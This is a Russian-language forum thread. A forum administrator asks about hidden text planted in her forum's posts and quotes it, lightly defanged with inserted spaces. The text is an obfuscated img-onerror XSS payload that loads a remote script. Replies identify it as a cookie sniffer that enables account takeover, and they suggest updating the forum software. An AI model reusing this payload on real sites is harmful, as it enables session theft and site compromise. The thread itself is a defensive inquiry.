Перейти к контенту

Что это за скрипт?


Рекомендуемые сообщения

Здравствуйте!

Не знаю, к какой теме это относится, но мне очень нужна ваша помощь.

На нашем форуме один "добрый человек" периодически оставляет сообщения со скрытым текстом. Т.е. если открыть сообщение для редактирования, то его видно, а так нет. Я его привела ниже в неактивном виде (добавила лишние пробелы).

 

Что это за зверь, чем нам это грозит и что делать?

 

img src="http://www.antichat.ru/[snap back] onerror=sc_ript=doc ument.createElement(String.fro mCharCode(115,99,114,105,112,116)),sc_ript.src=/http:xxunde rwater.cup.suxipbxya.js/.sou rce.replace(/x/g,String.fromCharCode(47)),head=docum ent.getElementsByTagName(String.from CharCode(104,101,97,100)).item(0),head.appendChild(sc_ript) style=visib ility:hidden =[/snapb ack].gif" border="0" alt="Изображение"

Ссылка на комментарий
Поделиться на других сайтах

В куках содержится твой хэш. Зная твой хеш можно:

1) зайти на форум под твоим логином

2) если ты имеешь доступ в АП, расшифровав твой хеш, можно зайти тобой в АП

 

А если уже хакер попадет в АП, то он скорее всего сможет залить свой шелл и тогда сделать дефэйс всего сайта.

Ссылка на комментарий
Поделиться на других сайтах

Другими словами, если я админ этого форума, то все в итоге будет коту под хвост.

 

Печально.(ругательства вырезаны :D )

 

А как от этого защититься? В данном случае и чтобы этого в будущем не было. Ваша ссылка поможет?

У нас на форуме регистрация не обязательная. В первый раз он зарегился, а второй раз оставил сообщение под гостем.

 

А как быстро действует данный скрипт? И по какому принципу: надо щелкнуть на сообщении или автоматом.

Ссылка на комментарий
Поделиться на других сайтах

А как от этого защититься?

 

Вам уже писали, или у вас проблемы со зрением?

 

Что это за скрипт?

Ссылка на комментарий
Поделиться на других сайтах

То, что у тебя - это сниффер, он ворует куки всех, кто откроет страницу с этим кодом и посылает их на удаленныйц сервер скрипту. Видимо, там они сохраняются, не в курсе. Далее, может легко зайти под вашим логином. А если комп мощный - расшифровать ваш пароль (или если ваш пароль легкий и состоит из мал. кол-ва цифр)

 

Защищаться от этого нужно путем установления всего, что пишется в разделе новости. И ставить версии стабильные - 1.3, 2.1.7

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить в этой теме...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.